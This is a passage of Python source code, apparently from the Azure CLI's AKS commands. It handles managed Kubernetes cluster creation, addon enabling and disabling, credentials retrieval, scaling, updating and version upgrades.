ManagedClusterServicePrincipalProfile( client_id=principal_obj.get("service_principal"), secret=principal_obj.get("client_secret"), key_vault_secret_ref=None) need_post_creation_vnet_permission_granting = False if (vnet_subnet_id and not skip_subnet_role_assignment and not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)): # if service_principal_profile is None, then this cluster is an MSI cluster, # and the service principal does not exist. Two cases: # 1. For system assigned identity, we just tell user to grant the # permission after the cluster is created to keep consistent with portal experience. # 2. For user assigned identity, we can grant needed permission to # user provided user assigned identity before creating managed cluster. if service_principal_profile is None and not assign_identity: msg = ('It is highly recommended to use USER assigned identity ' '(option --assign-identity) when you want to bring your own' 'subnet, which will have no latency for the role assignment to ' 'take effect. When using SYSTEM assigned identity, ' 'azure-cli will grant Network Contributor role to the ' 'system assigned identity after the cluster is created, and ' 'the role assignment will take some time to take effect, see ' 'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, ' 'proceed to create cluster with system assigned identity?') if not yes and not prompt_y_n(msg, default="n"): return None need_post_creation_vnet_permission_granting = True else: scope = vnet_subnet_id identity_client_id = "" if assign_identity: identity_client_id = _get_user_assigned_identity_client_id(cmd.cli_ctx, assign_identity) else: identity_client_id = service_principal_profile.client_id if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor', identity_client_id, scope=scope): logger.warning('Could not create a role assignment for subnet. ' 'Are you an Owner on this subscription?') load_balancer_profile = create_load_balancer_profile( load_balancer_managed_outbound_ip_count, load_balancer_outbound_ips, load_balancer_outbound_ip_prefixes, load_balancer_outbound_ports, load_balancer_idle_timeout) if attach_acr: if enable_managed_identity: if no_wait: raise CLIError('When --attach-acr and --enable-managed-identity are both specified, ' '--no-wait is not allowed, please wait until the whole operation succeeds.') # Attach acr operation will be handled after the cluster is created else: _ensure_aks_acr(cmd.cli_ctx, client_id=service_principal_profile.client_id, acr_name_or_id=attach_acr, subscription_id=subscription_id) outbound_type = _set_outbound_type(outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile) network_profile = None if any([network_plugin, pod_cidr, service_cidr, dns_service_ip, docker_bridge_address, network_policy]): if not network_plugin: raise CLIError('Please explicitly specify the network plugin type') if pod_cidr and network_plugin == "azure": raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified') network_profile = ContainerServiceNetworkProfile( network_plugin=network_plugin, pod_cidr=pod_cidr, service_cidr=service_cidr, dns_service_ip=dns_service_ip, docker_bridge_cidr=docker_bridge_address, network_policy=network_policy, load_balancer_sku=load_balancer_sku.lower(), load_balancer_profile=load_balancer_profile, outbound_type=outbound_type ) else: if load_balancer_sku.lower() == "standard" or load_balancer_profile: network_profile = ContainerServiceNetworkProfile( network_plugin="kubenet", load_balancer_sku=load_balancer_sku.lower(), load_balancer_profile=load_balancer_profile, outbound_type=outbound_type, ) if load_balancer_sku.lower() == "basic": network_profile = ContainerServiceNetworkProfile( load_balancer_sku=load_balancer_sku.lower(), ) addon_profiles = _handle_addons_args( cmd, enable_addons, subscription_id, resource_group_name, {}, workspace_resource_id, aci_subnet_name, vnet_subnet_id, appgw_name, appgw_subnet_cidr, appgw_id, appgw_subnet_id, appgw_watch_namespace, enable_sgxquotehelper ) monitoring = False if CONST_MONITORING_ADDON_NAME in addon_profiles: monitoring = True _ensure_container_insights_for_monitoring(cmd, addon_profiles[CONST_MONITORING_ADDON_NAME]) # addon is in the list and is enabled ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \ addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled os_type = 'Linux' enable_virtual_node = False if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles: enable_virtual_node = True aad_profile = None if enable_aad: if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]): raise CLIError('"--enable-aad" cannot be used together with ' '"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"') aad_profile = ManagedClusterAADProfile( managed=True, admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids), tenant_id=aad_tenant_id ) else: if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]): if aad_tenant_id is None: profile = Profile(cli_ctx=cmd.cli_ctx) _, _, aad_tenant_id = profile.get_login_credentials() aad_profile = ManagedClusterAADProfile( client_app_id=aad_client_app_id, server_app_id=aad_server_app_id, server_app_secret=aad_server_app_secret, tenant_id=aad_tenant_id ) api_server_access_profile = None if enable_private_cluster and load_balancer_sku.lower() != "standard": raise CLIError("Please use standard load balancer for private cluster") if api_server_authorized_ip_ranges or enable_private_cluster: api_server_access_profile = _populate_api_server_access_profile( api_server_authorized_ip_ranges, enable_private_cluster=enable_private_cluster ) # Check that both --disable-rbac and --enable-rbac weren't provided if all([disable_rbac, enable_rbac]): raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.') identity = None if not enable_managed_identity and assign_identity: raise ArgumentUsageError('--assign-identity can only be specified when --enable-managed-identity is specified') if enable_managed_identity and not assign_identity: identity = ManagedClusterIdentity( type="SystemAssigned" ) elif enable_managed_identity and assign_identity: user_assigned_identity = { assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue() } identity = ManagedClusterIdentity( type="UserAssigned", user_assigned_identities=user_assigned_identity ) mc = ManagedCluster( location=location, tags=tags, dns_prefix=dns_name_prefix, kubernetes_version=kubernetes_version, enable_rbac=not disable_rbac, agent_pool_profiles=[agent_pool_profile], linux_profile=linux_profile, windows_profile=windows_profile, service_principal_profile=service_principal_profile, network_profile=network_profile, addon_profiles=addon_profiles, aad_profile=aad_profile, auto_scaler_profile=cluster_autoscaler_profile, api_server_access_profile=api_server_access_profile, identity=identity, disk_encryption_set_id=node_osdisk_diskencryptionset_id ) if uptime_sla: mc.sku = ManagedClusterSKU( name="Basic", tier="Paid" ) # Add AAD session key to header. # If principal_obj is None, we will not add this header, this can happen # when the cluster enables managed identity. In this case, the header is useless # and that's OK to not add this header custom_headers = None if principal_obj: custom_headers = {'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")} # Due to SPN replication latency, we do a few retries here max_retry = 30 retry_exception = Exception(None) for _ in range(0, max_retry): try: need_pull_for_result = (monitoring or (enable_managed_identity and attach_acr) or ingress_appgw_addon_enabled or enable_virtual_node or need_post_creation_vnet_permission_granting) if need_pull_for_result: # adding a wait here since we rely on the result for role assignment result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update( resource_group_name=resource_group_name, resource_name=name, parameters=mc)) else: result = sdk_no_wait(no_wait, client.create_or_update, resource_group_name=resource_group_name, resource_name=name, parameters=mc, custom_headers=custom_headers) if monitoring: cloud_name = cmd.cli_ctx.cloud.name # add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM # mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud if cloud_name.lower() == 'azurecloud': from msrestazure.tools import resource_id cluster_resource_id = resource_id( subscription=subscription_id, resource_group=resource_group_name, namespace='Microsoft.ContainerService', type='managedClusters', name=name ) _add_monitoring_role_assignment(result, cluster_resource_id, cmd) if enable_managed_identity and attach_acr: if result.identity_profile is None or result.identity_profile["kubeletidentity"] is None: logger.warning('Your cluster is successfully created, but we failed to attach acr to it, ' 'you can manually grant permission to the identity named <ClUSTER_NAME>-agentpool ' 'in MC_ resource group to give it permission to pull from ACR.') else: kubelet_identity_client_id = result.identity_profile["kubeletidentity"].client_id _ensure_aks_acr(cmd.cli_ctx, client_id=kubelet_identity_client_id, acr_name_or_id=attach_acr, subscription_id=subscription_id) if ingress_appgw_addon_enabled: _add_ingress_appgw_addon_role_assignment(result, cmd) if enable_virtual_node: _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id) if need_post_creation_vnet_permission_granting: if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor', result.identity.principal_id, scope=vnet_subnet_id, resolve_assignee=False): logger.warning('Could not create a role assignment for subnet. ' 'Are you an Owner on this subscription?') return result except CloudError as ex: retry_exception = ex if 'not found in Active Directory tenant' in ex.message: time.sleep(3) else: raise ex raise retry_exception def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False): instance = client.get(resource_group_name, name) subscription_id = get_subscription_id(cmd.cli_ctx) instance = _update_addons( cmd, instance, subscription_id, resource_group_name, name, addons, enable=False, no_wait=no_wait ) # send the managed cluster representation to update the addon profiles return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None, subnet_name=None, appgw_name=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None, appgw_watch_namespace=None, enable_sgxquotehelper=False, no_wait=False): instance = client.get(resource_group_name, name) subscription_id = get_subscription_id(cmd.cli_ctx) instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True, workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper, no_wait=no_wait) enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \ and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \ and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled os_type = 'Linux' virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and instance.addon_profiles[virtual_node_addon_name].enabled) need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node if need_pull_for_result: if enable_monitoring: _ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME]) # adding a wait here since we rely on the result for role assignment result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance)) if enable_monitoring: cloud_name = cmd.cli_ctx.cloud.name # mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud if cloud_name.lower() == 'azurecloud': from msrestazure.tools import resource_id cluster_resource_id = resource_id( subscription=subscription_id, resource_group=resource_group_name, namespace='Microsoft.ContainerService', type='managedClusters', name=name ) _add_monitoring_role_assignment(result, cluster_resource_id, cmd) if ingress_appgw_addon_enabled: _add_ingress_appgw_addon_role_assignment(result, cmd) if enable_virtual_node: # All agent pool will reside in the same vnet, we will grant vnet level Contributor role # in later function, so using a random agent pool here is OK random_agent_pool = result.agent_pool_profiles[0] if random_agent_pool.vnet_subnet_id != "": _add_virtual_node_role_assignment(cmd, result, random_agent_pool.vnet_subnet_id) # Else, the cluster is not using custom VNet, the permission is already granted in AKS RP, # we don't need to handle it in client side in this case. else: result = sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) return result def aks_get_versions(cmd, client, location): return client.list_orchestrators(location, resource_type='managedClusters') def aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=os.path.join(os.path.expanduser('~'), '.kube', 'config'), overwrite_existing=False, context_name=None): credentialResults = None if admin: credentialResults = client.list_cluster_admin_credentials(resource_group_name, name) else: credentialResults = client.list_cluster_user_credentials(resource_group_name, name) if not credentialResults: raise CLIError("No Kubernetes credentials found.") try: kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8') _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name) except (IndexError, ValueError): raise CLIError("Fail to find kubeconfig file.") def aks_list(cmd, client, resource_group_name=None): if resource_group_name: managed_clusters = client.list_by_resource_group(resource_group_name) else: managed_clusters = client.list() return _remove_nulls(list(managed_clusters)) def aks_show(cmd, client, resource_group_name, name): mc = client.get(resource_group_name, name) return _remove_nulls([mc])[0] def aks_update_credentials(cmd, client, resource_group_name, name, reset_service_principal=False, reset_aad=False, service_principal=None, client_secret=None, aad_server_app_id=None, aad_server_app_secret=None, aad_client_app_id=None, aad_tenant_id=None, no_wait=False): if bool(reset_service_principal) == bool(reset_aad): raise CLIError('usage error: --reset-service-principal | --reset-aad-profile') if reset_service_principal: if service_principal is None or client_secret is None: raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET') return sdk_no_wait(no_wait, client.reset_service_principal_profile, resource_group_name, name, service_principal, client_secret) if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]): raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID ' '--aad-server-app-secret SECRET [--aad-tenant-id ID]') parameters = { 'clientAppID': aad_client_app_id, 'serverAppID': aad_server_app_id, 'serverAppSecret': aad_server_app_secret, 'tenantID': aad_tenant_id } return sdk_no_wait(no_wait, client.reset_aad_profile, resource_group_name, name, parameters) def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False): instance = client.get(resource_group_name, name) if len(instance.agent_pool_profiles) > 1 and nodepool_name == "": raise CLIError('There are more than one node pool in the cluster. ' 'Please specify nodepool name or use az aks nodepool command to scale node pool') for agent_profile in instance.agent_pool_profiles: if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1): if agent_profile.enable_auto_scaling: raise CLIError("Cannot scale cluster autoscaler enabled node pool.") agent_profile.count = int(node_count) # pylint: disable=no-member # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name)) # pylint: disable=inconsistent-return-statements def aks_update(cmd, client, resource_group_name, name, enable_cluster_autoscaler=False, disable_cluster_autoscaler=False, update_cluster_autoscaler=False, cluster_autoscaler_profile=None, min_count=None, max_count=None, uptime_sla=False, load_balancer_managed_outbound_ip_count=None, load_balancer_outbound_ips=None, load_balancer_outbound_ip_prefixes=None, load_balancer_outbound_ports=None, load_balancer_idle_timeout=None, attach_acr=None, detach_acr=None, api_server_authorized_ip_ranges=None, enable_aad=False, aad_tenant_id=None, aad_admin_group_object_ids=None, enable_ahub=False, disable_ahub=False, no_wait=False): update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count, load_balancer_outbound_ips, load_balancer_outbound_ip_prefixes, load_balancer_outbound_ports, load_balancer_idle_timeout) update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None) # pylint: disable=too-many-boolean-expressions if (update_autoscaler != 1 and cluster_autoscaler_profile is None and not update_lb_profile and not attach_acr and not detach_acr and not uptime_sla and api_server_authorized_ip_ranges is None and not enable_aad and not update_aad_profile and not enable_ahub and not disable_ahub): raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or ' '"--disable-cluster-autoscaler" or ' '"--update-cluster-autoscaler" or ' '"--cluster-autoscaler-profile" or ' '"--load-balancer-managed-outbound-ip-count" or' '"--load-balancer-outbound-ips" or ' '"--load-balancer-outbound-ip-prefixes" or' '"--load-balancer-outbound-ports" or' '"--load-balancer-idle-timeout" or' '"--attach-acr" or "--detach-acr" or' '"--uptime-sla" or' '"--api-server-authorized-ip-ranges" or ' '"--enable-aad" or ' '"--aad-tenant-id" or ' '"--aad-admin-group-object-ids" or ' '"--enable-ahub" or ' '"--disable-ahub"') instance = client.get(resource_group_name, name) # For multi-agent pool, use the az aks nodepool command if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1: raise CLIError('There are more than one node pool in the cluster. Please use "az aks nodepool" command ' 'to update per node pool auto scaler settings') _validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or update_cluster_autoscaler) if enable_cluster_autoscaler: if instance.agent_pool_profiles[0].enable_auto_scaling: logger.warning('Cluster autoscaler is already enabled for this node pool.\n' 'Please run "az aks --update-cluster-autoscaler" ' 'if you want to update min-count or max-count.') return None instance.agent_pool_profiles[0].min_count = int(min_count) instance.agent_pool_profiles[0].max_count = int(max_count) instance.agent_pool_profiles[0].enable_auto_scaling = True if update_cluster_autoscaler: if not instance.agent_pool_profiles[0].enable_auto_scaling: raise CLIError('Cluster autoscaler is not enabled for this node pool.\n' 'Run "az aks nodepool update --enable-cluster-autoscaler" ' 'to enable cluster with min-count and max-count.') instance.agent_pool_profiles[0].min_count = int(min_count) instance.agent_pool_profiles[0].max_count = int(max_count) if disable_cluster_autoscaler: if not instance.agent_pool_profiles[0].enable_auto_scaling: logger.warning('Cluster autoscaler is already disabled for this node pool.') return None instance.agent_pool_profiles[0].enable_auto_scaling = False instance.agent_pool_profiles[0].min_count = None instance.agent_pool_profiles[0].max_count = None # if intention is to clear autoscaler profile if cluster_autoscaler_profile == {}: instance.auto_scaler_profile = {} # else profile is provided, update instance profile if it exists elif cluster_autoscaler_profile: instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__, dict((key.replace("-", "_"), value) for (key, value) in cluster_autoscaler_profile.items())) \ if instance.auto_scaler_profile else cluster_autoscaler_profile subscription_id = get_subscription_id(cmd.cli_ctx) client_id = "" if instance.identity is not None and instance.identity.type == "SystemAssigned": if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None: raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. ' 'Please do not set --attach-acr or --detach-acr. ' 'You can manually grant or revoke permission to the identity named ' '<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.') client_id = instance.identity_profile["kubeletidentity"].client_id else: client_id = instance.service_principal_profile.client_id if not client_id: raise CLIError('Cannot get the AKS cluster\'s service principal.') if attach_acr: _ensure_aks_acr(cmd.cli_ctx, client_id=client_id, acr_name_or_id=attach_acr, subscription_id=subscription_id) if detach_acr: _ensure_aks_acr(cmd.cli_ctx, client_id=client_id, acr_name_or_id=detach_acr, subscription_id=subscription_id, detach=True) if uptime_sla: instance.sku = ManagedClusterSKU( name="Basic", tier="Paid" ) if update_lb_profile: instance.network_profile.load_balancer_profile = update_load_balancer_profile( load_balancer_managed_outbound_ip_count, load_balancer_outbound_ips, load_balancer_outbound_ip_prefixes, load_balancer_outbound_ports, load_balancer_idle_timeout, instance.network_profile.load_balancer_profile) # empty string is valid as it disables ip whitelisting if api_server_authorized_ip_ranges is not None: instance.api_server_access_profile = \ _populate_api_server_access_profile(api_server_authorized_ip_ranges, instance=instance) if enable_aad: if instance.aad_profile is not None and instance.aad_profile.managed: raise CLIError('Cannot specify "--enable-aad" if managed AAD is already enabled') instance.aad_profile = ManagedClusterAADProfile( managed=True ) if update_aad_profile: if instance.aad_profile is None or not instance.aad_profile.managed: raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"' ' if managed AAD is not enabled') if aad_tenant_id is not None: instance.aad_profile.tenant_id = aad_tenant_id if aad_admin_group_object_ids is not None: instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids) if enable_ahub and disable_ahub: raise CLIError('Cannot specify "--enable-ahub" and "--disable-ahub" at the same time') if enable_ahub: instance.windows_profile.license_type = 'Windows_Server' if disable_ahub: instance.windows_profile.license_type = 'None' return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) # pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version='', control_plane_only=False, node_image_only=False, no_wait=False, yes=False): msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?' if not yes and not prompt_y_n(msg, default="n"): return None instance = client.get(resource_group_name, name) vmas_cluster = False for agent_profile in instance.agent_pool_profiles: if agent_profile.type.lower() == "availabilityset": vmas_cluster = True break if kubernetes_version != '' and node_image_only: raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. ' 'If you only want to upgrade the node version please use the "--node-image-only" option only.') if node_image_only: msg = "This node image upgrade operation will run across every node pool in the cluster" \ "and might take a while, do you wish to continue?" if not yes and not prompt_y_n(msg, default="n"): return None # This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all # nodepools of a cluster. The SDK only support upgrade single nodepool at a time. for agent_pool_profile in instance.agent_pool_profiles: if vmas_cluster: raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation ' 'can only be applied on VirtualMachineScaleSets cluster.') _upgrade_single_nodepool_image_version(True, client, resource_group_name, name, agent_pool_profile.name) mc = client.get(resource_group_name, name) return _remove_nulls([mc])[0] if instance.kubernetes_version == kubernetes_version: if instance.provisioning_state == "Succeeded": logger.warning("The cluster is already on version %s and is not in a failed state. No operations " "will occur when upgrading to the same version if the cluster is not in a failed state.", instance.kubernetes_version) elif instance.provisioning_state == "Failed": logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to " "attempt resolution of failed cluster state.", instance.kubernetes_version) upgrade_all = False instance.kubernetes_version = kubernetes_version # for legacy clusters, we always upgrade node pools with CCP. if instance.max_agent_pools < 8 or vmas_cluster: if control_plane_only: msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be " "upgraded to {} as well. Continue?").format(instance.kubernetes_version) if not yes and not prompt_y_n(msg, default="n"): return None upgrade_all = True else: if not control_plane_only: msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane " "AND all nodepools to version {}. Continue?").format(instance.kubernetes_version) if not yes and not prompt_y_n(msg, default="n"): return None upgrade_all = True else: msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. " "Node pool will not change. Continue?").format(instance.kubernetes_version) if not yes and not prompt_y_n(msg, default="n"): return None if upgrade_all: for agent_profile in instance.agent_pool_profiles: agent_profile.orchestrator_version = kubernetes_version # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name): return sdk_no_wait(no_wait, client.upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name) DEV_SPACES_EXTENSION_NAME = 'dev-spaces' DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom' def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None, endpoint_type='Public', prompt=False): """ Use Azure Dev Spaces with a managed Kubernetes cluster. :param name: Name of the managed cluster. :type name: String :param resource_group_name: Name of resource group. You can configure the default group. \ Using 'az configure --defaults group=<name>'. :type resource_group_name: String :param update: Update to the latest Azure Dev Spaces client components. :type update: bool :param space_name: Name of the new or existing dev space to select. Defaults to an \ interactive selection experience. :type space_name: String :param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \ See https://aka.ms/azds-networking for more information. :type endpoint_type: String :param prompt: Do not prompt for confirmation. Requires --space. :type prompt: bool """ if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update): azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE) try: azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, endpoint_type, prompt) except TypeError: raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.") except AttributeError as ae: raise CLIError(ae) def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False): """ Remove Azure Dev Spaces from a managed Kubernetes cluster. :param name: Name of the managed cluster. :type name: String :param resource_group_name: Name of resource group. You can configure the default group. \ Using 'az configure --defaults group=<name>'. :type resource_group_name: String :param prompt: Do not prompt for confirmation. :type prompt: bool """ if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE): azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE) try: azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt) except AttributeError as ae: raise CLIError(ae) def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name) def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable, workspace_resource_id=None, subnet_name=None, appgw_name=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None, appgw_watch_namespace=None, enable_sgxquotehelper=False, no_wait=False): # parse the comma-separated addons argument addon_args = addons.split(',') addon_profiles = instance.addon_profiles or {} os_type = 'Linux' # for each addons argument for addon_arg in addon_args: if addon_arg not in ADDONS: raise CLIError("Invalid addon name: {}.".format(addon_arg)) addon = ADDONS[addon_arg] if addon == CONST_VIRTUAL_NODE_ADDON_NAME: # only linux is supported for now, in the future this will be a user flag addon += os_type # honor addon names defined in Azure CLI for key in list(addon_profiles): if key.lower() == addon.lower() and key != addon: addon_profiles[addon] = addon_profiles.pop(key) if enable: # add new addons or update existing ones and enable them addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False)) # special config handling for certain addons if addon == CONST_MONITORING_ADDON_NAME: if addon_profile.enabled: raise CLIError('The monitoring addon is already enabled for this managed cluster.\n' 'To change monitoring configuration, run "az aks disable-addons -a monitoring"' 'before enabling it again.') if not workspace_resource_id: workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring( cmd, subscription_id, resource_group_name) workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') addon_profile.config = {CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id} elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type): if addon_profile.enabled: raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n' 'To change virtual-node configuration, run ' '"az aks disable-addons -a virtual-node -g {resource_group_name}" ' 'before enabling it again.') if not subnet_name: raise CLIError('The aci-connector addon requires setting a subnet name.') addon_profile.config = {CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name} elif addon == CONST_INGRESS_APPGW_ADDON_NAME: if addon_profile.enabled: raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n' 'To change ingress-appgw configuration, run ' f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" ' 'before enabling it again.') addon_profile = ManagedClusterAddonProfile(enabled=True, config={}) if appgw_name is not None: addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name if appgw_subnet_cidr is not None: addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr if appgw_id is not None: addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id if appgw_subnet_id is not None: addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id if appgw_watch_namespace is not None: addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace elif addon == CONST_CONFCOM_ADDON_NAME: if addon_profile.enabled: raise ValidationError('The confcom addon is already enabled for this managed cluster.', recommendation='To change confcom configuration, run ' f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" ' 'before enabling it again.') addon_profile = ManagedClusterAddonProfile( enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"}) if enable_sgxquotehelper: addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true" addon_profiles[addon] = addon_profile else: if addon not in addon_profiles: if addon == CONST_KUBE_DASHBOARD_ADDON_NAME: addon_profiles[addon] = ManagedClusterAddonProfile(enabled=False) else: raise CLIError("The addon {} is not installed.".format(addon)) addon_profiles[addon].config = None addon_profiles[addon].enabled = enable instance.addon_profiles = addon_profiles # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return instance def _get_azext_module(extension_name, module_name): try: # Adding the installed extension in the path from azure.cli.core.extension.operations import add_extension_to_path add_extension_to_path(extension_name) # Import the extension module from importlib import import_module azext_custom = import_module(module_name) return azext_custom except ImportError as ie: raise CLIError(ie) def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None, workspace_resource_id=None, aci_subnet_name=None, vnet_subnet_id=None, appgw_name=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None, appgw_watch_namespace=None, enable_sgxquotehelper=False): if not addon_profiles: addon_profiles = {} addons = addons_str.split(',') if addons_str else [] if 'http_application_routing' in addons: addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True) addons.remove('http_application_routing') if 'kube-dashboard' in addons: addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True) addons.remove('kube-dashboard') # TODO: can we help the user find a workspace resource ID? if 'monitoring' in addons: if not workspace_resource_id: # use default workspace if exists else create default workspace workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring( cmd, subscription_id, resource_group_name) workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile( enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}) addons.remove('monitoring') # error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is elif workspace_resource_id: raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".') if 'azure-policy' in addons: addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True) addons.remove('azure-policy') if 'virtual-node' in addons: if not aci_subnet_name or not vnet_subnet_id: raise CLIError('"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".') # TODO: how about aciConnectorwindows, what is its addon name? os_type = 